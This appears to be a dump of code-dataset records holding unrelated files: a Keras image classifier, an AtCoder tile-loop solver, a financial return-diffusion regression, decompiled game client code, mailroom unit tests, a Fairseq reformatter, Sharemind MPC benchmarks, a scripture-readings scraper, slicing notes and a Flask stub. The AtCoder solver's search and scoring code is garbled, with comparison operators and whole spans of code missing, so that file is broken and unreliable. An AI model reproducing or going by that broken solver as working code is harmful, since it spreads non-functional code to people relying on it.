VALIDATION_DIR = 'dataset-test'\n # validation_datagen = ImageDataGenerator(rescale=1. / 255)\n\n train_generator = training_datagen.flow_from_directory(\n TRAINING_DIR,\n target_size=(150, 150),\n class_mode='categorical',\n subset='training',\n )\n\n validation_generator = training_datagen.flow_from_directory(\n TRAINING_DIR,\n target_size=(150, 150),\n class_mode='categorical',\n subset='validation',\n )\n\n # validation_generator = validation_datagen.flow_from_directory(\n # VALIDATION_DIR,\n # target_size=(150, 150),\n # class_mode='categorical'\n # )\n\n model = tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(64, (3, 3), activation='relu', input_shape=(150, 150, 3)),\n tf.keras.layers.MaxPooling2D(2, 2),\n # The second convolution\n tf.keras.layers.Conv2D(64, (3, 3), activation='relu'),\n tf.keras.layers.MaxPooling2D(2, 2),\n # The third convolution\n tf.keras.layers.Conv2D(128, (3, 3), activation='relu'),\n tf.keras.layers.MaxPooling2D(2, 2),\n # The fourth convolution\n tf.keras.layers.Conv2D(128, (3, 3), activation='relu'),\n tf.keras.layers.MaxPooling2D(2, 2),\n # Flatten the results to feed into a DNN\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dropout(0.5),\n # 512 neuron hidden layer\n tf.keras.layers.Dense(256, activation='relu'),\n tf.keras.layers.Dense(9, activation='softmax')\n ])\n\n model.summary()\n\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n\n class TrainCallback(keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs=None):\n if not logs:\n return\n\n if logs.get('accuracy') > 0.98:\n print(\"\\nReached 98% accuracy. Stopping training...\")\n self.model.stop_training = True\n\n callback = TrainCallback()\n\n history = model.fit(\n train_generator,\n steps_per_epoch=train_generator.samples,\n epochs=5,\n validation_data=validation_generator,\n validation_steps=validation_generator.samples,\n verbose=1,\n )\n\n model.save(\"../model\")\n\n acc = history.history['accuracy']\n val_acc = history.history['val_accuracy']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n\n epochs = range(len(acc))\n\n plt.plot(epochs, acc, 'r', label='Training accuracy')\n plt.plot(epochs, val_acc, 'b', label='Validation accuracy')\n plt.title('Training and validation accuracy')\n plt.legend(loc=0)\n plt.figure()\n\n plt.show()\n\n\nmain()\n","sub_path":"program_2/convolution.py","file_name":"convolution.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"516864149","text":"# https://atcoder.jp/contests/ahc010/tasks/ahc010_a\n\nimport sys\n# input = sys.stdin.buffer.readline\nsys.setrecursionlimit(10 ** 7)\nimport time\nstart = time.time()\n\nimport random\nimport copy\n\nvx = [-1, 0, 1, 0]\nvy = [ 0,-1, 0, 1]\nROTATE = [1, 2, 3, 0, 5, 4, 7, 6]\nTO = [\n\t[1, 0, -1, -1],\n\t[3, -1, -1, 0],\n\t[-1, -1, 3, 2],\n\t[-1, 2, 1, -1],\n\t[1, 0, 3, 2],\n\t[3, 2, 1, 0],\n\t[2, -1, 0, -1],\n\t[-1, 3, -1, 1],\n ]\n\nN = 30\nstrT = [input() for _ in range(N)]\n# T = [list(map(int, list(input()))) for _ in range(N)]\nT = [[0]*N for _ in range(N)]\nfor i in range(N):\n for j in range(N):\n T[i][j] = int(strT[i][j])\n# print(T)\n\ndef calc_point(ans):\n # print(\"calc_point\")\n point = 0\n rotateT = copy.copy(T)\n gone = [[False]*N for _ in range(N)]\n for i in range(N):\n for j in range(N):\n # rotateT[i][j] = int(T[i][j])\n # print(i, j, ans[i*N+j], T[i][j])\n for _ in range(ans[i*N+j]):\n # print(i, j, int(rotateT[i][j]))\n rotateT[i][j] = ROTATE[rotateT[i][j]]\n # print(rotateT)\n\n def dfs(si, sj, v, i, j, L):\n # if L>=20000:\n # print(si, sj, v, i, j, L)\n if si==4 and sj==6:\n print(si, sj, v, i, j, L, rotateT[i][j])\n if i==si and j==sj: return L+1\n nv = TO[rotateT[i][j]][(v+2)%4]\n if nv==-1: return -1\n ni, nj = i+vy[nv], j+vx[nv]\n if ni>=0 and ni=0 and nj=0 and ni=0 and nj=0 and ni=0 and nj=2:\n Llist.sort(reverse=True)\n point = Llist[0]*Llist[1]\n return point\n\nbest_ans = [0] * (N * N)\nbest_point = calc_point(best_ans)\n# while time.time() < start + 1.8:\n# ans = random.choices(range(4), k=N*N)\n# point = calc_point(ans)\n# # print(point, best_point, time.time() - start)\n# if point > best_point:\n# best_point = point\n# best_ans = copy.copy(ans)\n\n# print(best_ans)\nprint(''.join(map(str, best_ans)))\n","sub_path":"ahc/ahc010/ahc0010_a.py","file_name":"ahc0010_a.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"322024861","text":"import numpy as np\r\nimport pandas as pd\r\nfrom pathlib import Path\r\nimport matplotlib.pyplot as plt \r\nimport matplotlib.style as style\r\nfrom matplotlib import rc\r\nimport seaborn as sns\r\nfrom math import sqrt\r\nimport statsmodels.formula.api as smf\r\n\r\nstyle.use('seaborn-darkgrid')\r\n\r\nrc('text', usetex=True)\r\n\r\nEWJ_data = Path.cwd() / 'data' / 'EWJ.csv'\r\n\r\ndf = pd.read_csv(EWJ_data, parse_dates = [1], infer_datetime_format = True)\r\ndf['Date'] = pd.to_datetime(df['Date'])\r\n\r\nday = 1\r\nweek = 5\r\nmonth = 21\r\nquarter = 63\r\nhalf = 126\r\nyear = 252\r\nintervals = [day, week, month, quarter, half, year]\r\n\r\ndef returns_calculator(df , delta = 1):\r\n\tresult = []\r\n\ti = delta\r\n\twhile i in df.index:\r\n\t\tcurr_close, prev_close = df['Close'][i], df['Close'][i - delta]\r\n\t\treturn_rate = 100 * (curr_close - prev_close)/prev_close\r\n\t\tresult.append(return_rate)\r\n\t\ti += delta\r\n\treturn result\r\n\r\nresults = pd.DataFrame()\r\n\r\nresults['tau'] = np.array([i/252 for i in intervals])\r\nresults['Sqrttau'] = results['tau'].apply(sqrt)\r\nresults['StdDev'] = np.array([np.std(returns_calculator(df, i)) for i in intervals])\r\n\r\nmod = smf.ols(formula = 'StdDev ~ 1 + Sqrttau', data = results)\r\nres = mod.fit()\r\nprint(res.summary())\r\n\r\nfig, ax = plt.subplots()\r\n\r\nsns.regplot(\r\n\tx = 'Sqrttau', y = 'StdDev', line_kws = {'linestyle': '--', 'color': 'blue'},\r\n\t scatter_kws = {'color': 'black'}, data = results, ax = ax\r\n\t)\r\nax.set_title('Diffusion of Japanese Returns (Square Root Scale)')\r\nax.set_xlabel(r'$\\sqrt{Time(Year)}$')\r\nax.set_ylabel('Standard Deviation of Returns (\\%)')\r\nplt.show()\r\n\r\n","sub_path":"school/japanese_returns_problemsets/ps_2.py","file_name":"ps_2.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"22030440","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: scripts/client/gui/impl/lobby/mode_selector/items/battle_royale_mode_selector_item.py\nfrom gui.impl import backport\nfrom gui.impl.gen import R\nfrom gui.impl.gen.view_models.views.lobby.mode_selector.mode_selector_card_types import ModeSelectorCardTypes\nfrom gui.impl.lobby.mode_selector.items import setBattlePassState\nfrom gui.impl.lobby.mode_selector.items.base_item import ModeSelectorLegacyItem\nfrom helpers import dependency, time_utils\nfrom gui.impl.lobby.mode_selector.items.items_constants import ModeSelectorRewardID\nfrom gui.Scaleform.locale.EPIC_BATTLE import EPIC_BATTLE\nfrom skeletons.gui.game_control import IBattleRoyaleController\nfrom gui.impl.backport.backport_tooltip import createAndLoadBackportTooltipWindow\nfrom gui.Scaleform.genConsts.TOOLTIPS_CONSTANTS import TOOLTIPS_CONSTANTS\nfrom gui import GUI_SETTINGS\n\nclass BattleRoyaleModeSelectorItem(ModeSelectorLegacyItem):\n __slots__ = ()\n _CARD_VISUAL_TYPE = ModeSelectorCardTypes.BATTLE_ROYALE\n __battleRoyaleController = dependency.descriptor(IBattleRoyaleController)\n\n @property\n def hasExtendedCalendarTooltip(self):\n return True\n\n def getExtendedCalendarTooltip(self, parentWindow):\n return createAndLoadBackportTooltipWindow(parentWindow, tooltipId=TOOLTIPS_CONSTANTS.BATTLE_ROYALE_SELECTOR_CALENDAR_INFO, isSpecial=True, specialArgs=(None,))\n\n def _urlProcessing(self, url):\n return GUI_SETTINGS.checkAndReplaceWebBridgeMacros(url)\n\n def _onInitializing(self):\n super(BattleRoyaleModeSelectorItem, self)._onInitializing()\n self.__battleRoyaleController.onPrimeTimeStatusUpdated += self.__onUpdate\n self.__battleRoyaleController.onUpdated += self.__onUpdate\n self.__fillViewModel()\n\n def _onDisposing(self):\n self.__battleRoyaleController.onPrimeTimeStatusUpdated -= self.__onUpdate\n self.__battleRoyaleController.onUpdated -= self.__onUpdate\n super(BattleRoyaleModeSelectorItem, self)._onDisposing()\n\n def _getIsDisabled(self):\n ctrl = self.__battleRoyaleController\n season = ctrl.getCurrentSeason() or ctrl.getNextSeason()\n return not (ctrl.isEnabled() and season is not None)\n\n def _isInfoIconVisible(self):\n return True\n\n def __onUpdate(self, *_):\n self.__fillViewModel()\n\n def __fillViewModel(self):\n with self.viewModel.transaction() as vm:\n season = self.__battleRoyaleController.getCurrentSeason() or self.__battleRoyaleController.getNextSeason()\n currTime = time_utils.getCurrentLocalServerTimestamp()\n if season is None:\n return\n self.__resetViewModel(vm)\n if season.hasActiveCycle(currTime):\n if self.__battleRoyaleController.isEnabled():\n timeLeftStr = time_utils.getTillTimeString(season.getCycleEndDate() - currTime, EPIC_BATTLE.STATUS_TIMELEFT, removeLeadingZeros=True)\n vm.setTimeLeft(timeLeftStr)\n self._addReward(ModeSelectorRewardID.CREDITS)\n self._addReward(ModeSelectorRewardID.OTHER)\n else:\n cycleInfo = season.getNextByTimeCycle(currTime)\n if cycleInfo is not None:\n if cycleInfo.announceOnly:\n text = backport.text(R.strings.battle_royale.modeSelector.cycleIsComing())\n else:\n text = backport.text(R.strings.battle_royale.modeSelector.cycleNotStarted(), date=backport.getShortDateFormat(cycleInfo.startDate))\n vm.setStatusNotActive(text)\n vm.setTimeLeft('')\n setBattlePassState(self.viewModel)\n return\n\n @staticmethod\n def __resetViewModel(vm):\n vm.setTimeLeft('')\n vm.setStatusActive('')\n vm.setStatusNotActive('')\n vm.setEventName('')\n vm.getRewardList().clear()\n","sub_path":"source/res/scripts/client/gui/impl/lobby/mode_selector/items/battle_royale_mode_selector_item.py","file_name":"battle_royale_mode_selector_item.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"367589938","text":"import pytest\nfrom mailroom_OO import *\nfrom cli_main import *\nimport os\nfrom os import listdir\n\ndef test_Donor_initial():\n name = 'Bruce Wayne'\n donations = [645,423,851]\n d = Donor(name, donations)\n #Verify the name, donations, total, number and average properties are correct\n assert d.name == name\n assert d.donations == donations\n assert d.tot_donations == 1919\n assert d.num_donations == 3\n assert d.avg_donation == 639.67\n\ndef test_Donor_new_donation():\n name = 'Bruce Wayne'\n donations = [645,423,851]\n d = Donor(name, donations)\n assert d.name == name\n assert d.donations == donations\n #Verify that adding a new donation updates the properties\n d.new_donation(715)\n assert d.num_donations == 4\n assert d.donations[-1] == 715\n\ndef test_DonorCollection_initial_new_donor():\n dc = DonorCollection()\n assert dc.donor_list == []\n name = 'Bruce Wayne'\n donations = [645,423,851]\n d = Donor(name, donations)\n dc.new_donor(d)\n #Test the donor collection for adding a new donor\n assert dc.donor_list == [d]\n\ndef test_DonorCollection_new_donation():\n dc = DonorCollection()\n name = 'Bruce Wayne'\n donations = [645,423,851]\n d = Donor(name, donations)\n dc.new_donor(d)\n #Verify that the .donor_list recreates the donor list\n assert dc.donor_list == [d]\n dc.new_donation(name, 715)\n #Verify that the added donation is included\n assert d.donations[-1] == 715\n\n name = 'Alfred Pennyworth'\n donations = [243, 968]\n d = Donor(name, donations)\n dc.new_donor(d)\n #Verify that the donor list includes the latest addition\n assert dc.donor_list[-1] == d\n\ndef test_DonorCollection_list_donors():\n dc = DonorCollection()\n name = 'Bruce Wayne'\n donations = [645,423,851]\n d = Donor(name, donations)\n dc.new_donor(d)\n\n name = 'Alfred Pennyworth'\n donations = [243, 968]\n d = Donor(name, donations)\n dc.new_donor(d)\n\n #Verify the function that lists donors\n assert dc.list_donors() == 'Bruce Wayne\\nAlfred Pennyworth\\n'\n\ndef test_DonorCollection_ty():\n dc = DonorCollection()\n name = 'Bruce Wayne'\n donations = [645, 423, 851]\n d = Donor(name, donations)\n dc.new_donor(d)\n\n #Verify thank you text\n assert dc.ty_text(name) == 'Dear Bruce Wayne, thanks for the $851.00'\n\ndef test_CLI_ty_letters():\n dc = DonorCollection()\n name = 'Bruce Wayne'\n donations = [645,423,851]\n d = Donor(name, donations)\n dc.new_donor(d)\n\n name = 'Alfred Pennyworth'\n donations = [243, 968]\n d = Donor(name, donations)\n dc.new_donor(d)\n\n #Verify that \"Send letters to all Donors\" creates the appropriate .txt file\n send_letters_to_all_donors(dc)\n dir_path = os.path.dirname(os.path.realpath(__file__))\n filenames = listdir(dir_path)\n assert 'Bruce Wayne.txt' in filenames\n assert 'Alfred Pennyworth.txt' in filenames","sub_path":"students/kevin_t/lesson9/test_mailroom.py","file_name":"test_mailroom.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"286408623","text":"'''\nThis script presuppose the Sigmorphon 2020 shared task 0 data is stored in the directory task0-data/\n\ne.g.\n$ python fairseqFormat.py eng\n\nIt will turn all English train, dev, (test if there is test data) into the format Fairseq requires,\nand store the reformatted data in the current directory.\n'''\nimport sys, os, json\n\ndef reformat(fname, finputname, foutputname):\n with open(fname) as f, \\\n open(finputname, 'w') as finput, \\\n open(foutputname, 'w') as foutput:\n for line in f:\n lines = line.strip().split('\\t')\n lemma = lines[0].strip().replace(' ', '_')\n msd = lines[-1].strip().replace(' ', '_')\n if len(lines) == 3:\n form = lines[1].strip().replace(' ', '_')\n elif len(lines) == 2:\n form = '-'\n else:\n print('Please make sure each line in your file is a tab separated 3-column entry.')\n pos = msd.split(';')[0]\n if '.' in pos:\n pos = pos.split('.')[0]\n #input = [letter for letter in lemma] + [pos, 'CANONICAL'] + ['#'] + [tag for tag in msd.split(';')]\n input = [letter for letter in lemma] + [tag for tag in msd.split(';')]\n output = [letter for letter in form]\n finput.write(' '.join(input) + '\\n')\n foutput.write(' '.join(output) + '\\n')\n\nif __name__ == '__main__':\n\n lang_fam_dict = json.load(open('lang2fam.json'))\n\n lang_dir_dict = json.load(open('lang2dir.json'))\n\n lang = sys.argv[1]\n\n datadir = \"task0-data/\" + lang_dir_dict[lang]\n\n\n train = datadir + lang_fam_dict[lang] + '/' + lang + '.trn'\n trainin = 'train.' + lang + '.input'\n trainout = 'train.' + lang + '.output'\n\n print('training data:', train)\n if os.path.exists(train):\n reformat(train, trainin, trainout)\n\n dev = datadir + lang_fam_dict[lang] + '/' + lang + '.dev'\n devin = 'dev.' + lang + '.input'\n devout = 'dev.' + lang + '.output'\n\n print('dev data:', dev)\n if os.path.exists(dev):\n reformat(dev, devin, devout)\n\n test = datadir + lang_fam_dict[lang] + '/' + lang + '.tst'\n testin = 'test.' + lang + '.input'\n testout = 'test.' + lang + '.output'\n\n print('test data:', test)\n if os.path.exists(test):\n reformat(test, testin, testout)\n\n\n\n","sub_path":"fairseq_format.py","file_name":"fairseq_format.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"52828383","text":"from conclave import CodeGenConfig\nfrom conclave.codegen.sharemind import SharemindCodeGen, SharemindCodeGenConfig\nimport conclave.dispatch\nimport conclave.net\nfrom conclave.comp import dag_only\nimport conclave.lang as sal\nfrom conclave.utils import *\nimport sys\n\n\ndef setup():\n\n # define inputs\n colsIn1 = [\n defCol(\"a\", \"INTEGER\", [1]),\n defCol(\"b\", \"INTEGER\", [1])\n ]\n colsIn2 = [\n defCol(\"a\", \"INTEGER\", [2]),\n defCol(\"b\", \"INTEGER\", [2])\n ]\n colsIn3 = [\n defCol(\"a\", \"INTEGER\", [3]),\n defCol(\"b\", \"INTEGER\", [3])\n ]\n\n in1 = sal.create(\"in1\", colsIn1, set([1]))\n in2 = sal.create(\"in2\", colsIn2, set([2]))\n in3 = sal.create(\"in3\", colsIn3, set([3]))\n\n cl1 = sal._close(in1, \"cl1\", set([1, 2, 3]))\n cl2 = sal._close(in2, \"cl2\", set([1, 2, 3]))\n cl3 = sal._close(in3, \"cl3\", set([1, 2, 3]))\n\n rel = sal.concat([cl1, cl2, cl3], \"rel\")\n\n return set([in1, in2, in3]), rel\n\n\ndef agg(pid, config, sharemind_peer, f_size):\n\n @dag_only\n def protocol():\n\n inputs, rel = setup()\n res = sal.aggregate(rel, \"agg\", [\"a\"], \"b\", \"+\", \"total\")\n\n opened = sal._open(res, \"opened\", 1)\n\n return inputs\n\n cg = SharemindCodeGen(config, protocol(), pid)\n job = cg.generate(\"agg_{}\".format(f_size), \"\")\n job_queue = [job]\n\n conclave.dispatch.dispatch_all(None, sharemind_peer, job_queue)\n\n\ndef col_div(pid, config, sharemind_peer, f_size):\n\n @dag_only\n def protocol():\n\n inputs, rel = setup()\n res = sal.divide(rel, 'div1', 'a', ['a', 'b'])\n\n opened = sal._open(res, \"opened\", 1)\n\n return inputs\n\n cg = SharemindCodeGen(config, protocol(), pid)\n job = cg.generate(\"col_div_{}\".format(f_size), \"\")\n job_queue = [job]\n\n conclave.dispatch.dispatch_all(None, sharemind_peer, job_queue)\n\n\ndef col_mult(pid, config, sharemind_peer, f_size):\n\n @dag_only\n def protocol():\n\n inputs, rel = setup()\n res = sal.multiply(rel, 'mult1', 'a', ['a', 'b'])\n\n opened = sal._open(res, \"opened\", 1)\n\n return inputs\n\n cg = SharemindCodeGen(config, protocol(), pid)\n job = cg.generate(\"col_mult_{}\".format(f_size), \"\")\n job_queue = [job]\n\n conclave.dispatch.dispatch_all(None, sharemind_peer, job_queue)\n\n\ndef scalar_div(pid, config, sharemind_peer, f_size):\n\n @dag_only\n def protocol():\n\n inputs, rel = setup()\n res = sal.divide(rel, 'div1', 'a', ['a', 1])\n\n opened = sal._open(res, \"opened\", 1)\n\n return inputs\n\n cg = SharemindCodeGen(config, protocol(), pid)\n job = cg.generate(\"scalar_div_{}\".format(f_size), \"\")\n job_queue = [job]\n\n conclave.dispatch.dispatch_all(None, sharemind_peer, job_queue)\n\n\ndef scalar_mult(pid, config, sharemind_peer, f_size):\n\n @dag_only\n def protocol():\n\n inputs, rel = setup()\n res = sal.multiply(rel, 'mult1', 'a', ['a', 1])\n\n opened = sal._open(res, \"opened\", 1)\n\n return inputs\n\n cg = SharemindCodeGen(config, protocol(), pid)\n job = cg.generate(\"scalar_mult_{}\".format(f_size), \"\")\n job_queue = [job]\n\n conclave.dispatch.dispatch_all(None, sharemind_peer, job_queue)\n\n\ndef project(pid, config, sharemind_peer, f_size):\n\n @dag_only\n def protocol():\n\n inputs, rel = setup()\n\n cols = [column.name for column in rel.out_rel.columns][::-1]\n\n res = sal.project(rel, \"proja\", cols)\n\n opened = sal._open(res, \"opened\", 1)\n return inputs\n\n cg = SharemindCodeGen(config, protocol(), pid)\n job = cg.generate(\"project_{}\".format(f_size), \"\")\n job_queue = [job]\n\n conclave.dispatch.dispatch_all(None, sharemind_peer, job_queue)\n\n\ndef join(pid, config, sharemind_peer, f_size):\n\n @dag_only\n def protocol():\n\n colsIn1 = [\n defCol(\"a\", \"INTEGER\", [1]),\n defCol(\"b\", \"INTEGER\", [1])\n ]\n in1 = sal.create(\"in1\", colsIn1, set([1]))\n colsIn2 = [\n defCol(\"a\", \"INTEGER\", [2]),\n defCol(\"b\", \"INTEGER\", [2])\n ]\n in2 = sal.create(\"in2\", colsIn2, set([2]))\n\n cl1 = sal._close(in1, \"cl1\", set([1, 2, 3]))\n cl2 = sal._close(in2, \"cl2\", set([1, 2, 3]))\n\n res = sal.join(cl1, cl2, \"res\", [\"a\"], [\"a\"])\n\n opened = sal._open(res, \"opened\", 1)\n return set([in1, in2])\n\n cg = SharemindCodeGen(config, protocol(), pid)\n job = cg.generate(\"join_{}\".format(f_size), \"\")\n job_queue = [job]\n\n conclave.dispatch.dispatch_all(None, sharemind_peer, job_queue)\n\n\ndef no_hdfs():\n\n pid = int(sys.argv[1])\n num_tuples = sys.argv[2]\n op = sys.argv[3]\n\n # use if running locally\n #sharemind_config = {\n # \"pid\": pid,\n # \"parties\": {\n # 1: {\"host\": \"localhost\", \"port\": 9001},\n # 2: {\"host\": \"localhost\", \"port\": 9002},\n # 3: {\"host\": \"localhost\", \"port\": 9003}\n # }\n #}\n sharemind_config = {\n \"pid\": pid,\n \"parties\": {\n 1: {\"host\": \"ca-spark-node-0\", \"port\": 9001},\n 2: {\"host\": \"cb-spark-node-0\", \"port\": 9002},\n 3: {\"host\": \"cc-spark-node-0\", \"port\": 9003}\n }\n }\n\n workflow_name = \"{}_{}_{}\".format(op, num_tuples, pid)\n sm_cg_config = SharemindCodeGenConfig(\n workflow_name, \"/mnt/shared\", use_hdfs=False, use_docker=True)\n codegen_config = CodeGenConfig(\n workflow_name).with_sharemind_config(sm_cg_config)\n codegen_config.code_path = \"/mnt/shared/\" + workflow_name\n codegen_config.input_path = \"/mnt/shared\" + \"/\" + num_tuples\n codegen_config.output_path = \"/mnt/shared\" + \"/\" + num_tuples\n\n sm_peer = conclave.net.setup_peer(sharemind_config)\n\n if op == 'agg':\n agg(pid, codegen_config, sm_peer, num_tuples)\n elif op == 'col_div':\n col_div(pid, codegen_config, sm_peer, num_tuples)\n elif op == 'col_mult':\n col_mult(pid, codegen_config, sm_peer, num_tuples)\n elif op == 'scalar_div':\n scalar_div(pid, codegen_config, sm_peer, num_tuples)\n elif op == 'col_mult':\n scalar_mult(pid, codegen_config, sm_peer, num_tuples)\n elif op == 'project':\n project(pid, codegen_config, sm_peer, num_tuples)\n elif op == 'join':\n join(pid, codegen_config, sm_peer, num_tuples)\n else:\n print(\"Unknown:\", op)\n\n\nif __name__ == \"__main__\":\n\n no_hdfs()\n","sub_path":"examples/benchmarks/sharemind/unary_ops.py","file_name":"unary_ops.py","file_ext":"py","file_size_in_byte":6337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"345098406","text":"import datetime\nimport requests\nimport json\nimport sys\nimport pprint\ntoday = datetime.date.today()\napidate = today.strftime('%Y-%m-%d')\nr = requests.get('https://www.ewtn.com/se/readings/readingsservice.svc/day/'+apidate+'/en')\ndata = json.loads(r.text)\n#print(apidate)\n\nd = 0\nref = {}\nwhat = {}\npayload = {}\n\nfor reading in data['ReadingGroups'][0]['Readings']:\n ref[d] = reading['Citations'][0]['Reference']\n what[d] = reading['Type']\n d = d + 1;\n\npayload[\"Language\"] = \"en\"\npayload[\"References\"] = ref\nif(len(ref)==3):\n payload = {\"References\":[ref[2]],\"Language\":\"en\"};\nelse:\n payload = {\"References\":[ref[3]],\"Language\":\"en\"};\nheaders = {\"Referer\":\"https://www.ewtn.com/daily-readings/\",\"content-type\":\"application/json\"}\nr = requests.post(\"https://www.ewtn.com/se/readings/readingsservice.svc/books\", data=json.dumps(payload), headers=headers)\nverses = json.loads(r.text)\nprint(verses[0]['Reference'])\ndef prettyreadings(readings_input):\n r = 0\n for i in range(0,len(readings_input)):\n print(verses[0]['Chapters'][0]['Verses'][r]['Number'], end=\". \")\n print(verses[0]['Chapters'][0]['Verses'][r]['Text'], end=\"\")\n r = r+1\nprettyreadings(verses[0]['Chapters'][0]['Verses'])\n\n\n#pprint.pprint(verses)\nsys.stdout.flush()\n\n##{'Color': 'Violet',\n##'Date': '2018-02-26',\n##'Note': 'Total Consecration- Day 7',\n##'ReadingGroups': [{'Name': 'Default', 'Note': None,\n##\t'Readings': [{\n##\t\t'Citations':\n##\t\t[{'Note': None, 'Reference': 'Daniel 9:4-10'}],\n##\t\t\t'Type': 'Reading 1'},\n##\t\t\t{'Citations':\n##\t\t\t\t[{'Note': None, 'Reference': 'Psalms 79:8-9, 11, 13'}],\n##\t\t\t'Type': 'Psalm'},\n##\t\t\t{'Citations': [{'Note': None, 'Reference': 'Luke 6:36-38'}],\n##\t\t\t'Type': 'Gospel'}]}],\n##\t\t\t'Title': 'Lenten Weekday'}\n\n#[{\"Chapters\":\n#\t[{\"Number\":20,\n#\t\t\"Verses\":[{\"Number\":17,\n#\t\t\t\t\t\"Text\":\"And as Jesus was going up to Jerusalem, he took the twelve disciples aside, and on the way he said to them, \"},\n#\t\t\t\t{\"Number\":18,\n#\t\t\t\t\t\"Text\":\"\\\"Behold, we are going up to Jerusalem; and the Son of man will be delivered to the chief priests and scribes, and they will condemn him to death, \"},\n#\t\t\t\t{\"Number\":19,\n#\t\t\t\t\t\"Text\":\"and deliver him to the Gentiles to be mocked and scourged and crucified, and he will be raised on the third day.\\\" \"},\n#\t\t\t\t{\"Number\":20,\n#\t\t\t\t\t\"Text\":\"Then the mother of the sons of Zeb'edee came up to him, with her sons, and kneeling before him she asked him for something. \"},\n#\t\t\t\t{\"Number\":21,\n#\t\t\t\t\t\"Text\":\"And he said to her, \\\"What do you want?\\\" She said to him, \\\"Command that these two sons of mine may sit, one at your right hand and one at your left, in your kingdom.\\\" \"},\n#\t\t\t\t{\"Number\":22,\n#\t\t\t\t\t\"Text\":\"But Jesus answered, \\\"You do not know what you are asking. Are you able to drink the cup that I am to drink?\\\" They said to him, \\\"We are able.\\\" \"},\n#\t\t\t\t{\"Number\":23,\n#\t\t\t\t\t\"Text\":\"He said to them, \\\"You will drink my cup, but to sit at my right hand and at my left is not mine to grant, but it is for those for whom it has been prepared by my Father.\\\" \"},\n#\t\t\t\t{\"Number\":24,\n#\t\t\t\t\t\"Text\":\"And when the ten heard it, they were indignant at the two brothers. \"},\n#\t\t\t\t{\"Number\":25,\n#\t\t\t\t\t\"Text\":\"But Jesus called them to him and said, \\\"You know that the rulers of the Gentiles lord it over them, and their great men exercise authority over them. \"},\n#\t\t\t\t{\"Number\":26,\n#\t\t\t\t\t\"Text\":\"It shall not be so among you; but whoever would be great among you must be your servant, \"},\n#\t\t\t\t{\"Number\":27,\n#\t\t\t\t\t\"Text\":\"and whoever would be first among you must be your slave; \"},\n#\t\t\t\t{\"Number\":28,\n#\t\t\t\t\t\"Text\":\"even as the Son of man came not to be served but to serve, and to give his life as a ransom for many.\\\" \"}\n#\t\t\t\t]\n#\t\t\t}\n#\t\t],\n#\"Name\":\"Matthew\",\"Reference\":\"Matthew 20:17-28\",\"Verses\":\"20:17-28\"}]\n","sub_path":"prettyreadings2.py","file_name":"prettyreadings2.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"233089062","text":"# Why slices exclude last item\n# - Easy to see length of a list/ slice/ range when stop is given\n# - Easy to compute length of a list/ slice/ range when start & stop is given\n# - Easy to split a sequence into 2 parts without overlapping\nx = [2, 3, 4, 5]\nx[:2] # >>> [2, 3]\nx[2:] # >>> [4, 5]\n\n# Slicing sequences with a step\n\n# S[start: stop: step]\nls = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\neven_numbers = ls[1:-1:2]\n\n# The step can also be negative, returning elements in reverse\nls[::-1] # reverses the list\n\n\ninvoice = \"\"\"\n0.....6.................................40........52...55........\n1909 Pimoroni PiBrella $17.50 3 $52.50\n1489 6mm Tactile Switch x20 $4.95 2 $9.90\n1510 Panavise Jr. - PV-201 $28.00 1 $28.00\n1601 PiTFT Mini Kit 320x240 $34.95 1 $34.95\n\"\"\"\n\nSKU = slice(0, 6)\nDESCRIPTION = slice(6, 40)\nUNIT_PRICE = slice(40, 52)\nQUANTITY = slice(52, 55)\nITEM_TOTAL = slice(55, None)\nline_items = invoice.split('\\n')[2:]\n\nfor item in line_items:\n print(item[UNIT_PRICE], item[DESCRIPTION])\n\n# A list with lists of length 3\n# Example 2.12\n# Method 1\nboard = [['_'] * 3 for i in range(3)]\nboard[1][2] = 'X' # Only changes element on row 1, column 2\n# Method 2\nboard = []\n\nfor i in range(3):\n row = ['_'] * 3\n board.append(row)\n\n# Example 2.13\nweird_board = [['_'] * 3] * 3\n\nweird_board[1][2] = '0' # Assigns element[2] on every list\n# It appends the same row over and over\n\n# Method 2\nweird_board = []\nrow = ['_'] * 3\nfor i in range(3):\n weird_board.append(ls)\n\n# Augmented assignment: using '*=' or '+='\n# When using a mutable sequence, the original object's location in memory doesn't usually change\nl = ['a','b', 'c']\nid(l) #4508308104\nl *= 3\n#l #['a', 'b', 'c', 'a', 'b', 'c', 'a', 'b', 'c']\nid(l) # 4508308104\n\n# When using an immutable sequence, the original object's location in memory doesn't usually change\nt = ('a', 'b', 'c')\nid(t) #4509354456\nt *=3\n# t # ('a', 'b', 'c', 'a', 'b', 'c', 'a', 'b', 'c')\nid(t) #4508025504\n","sub_path":"chapter_two/tuple_slicing.py","file_name":"tuple_slicing.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"496074689","text":"\"\"\"\napp/__init__.py\n\ninitialise flask app object\n\"\"\"\nimport os\n\nfrom flasgger import Swagger\nfrom flask import Flask, Blueprint\n\nfrom app.api import (\n PathParameterExampleApi,\n JsonPayloadExampleApi,\n QueryParameterExampleApi,\n MultiParameterLocationExampleApi,\n 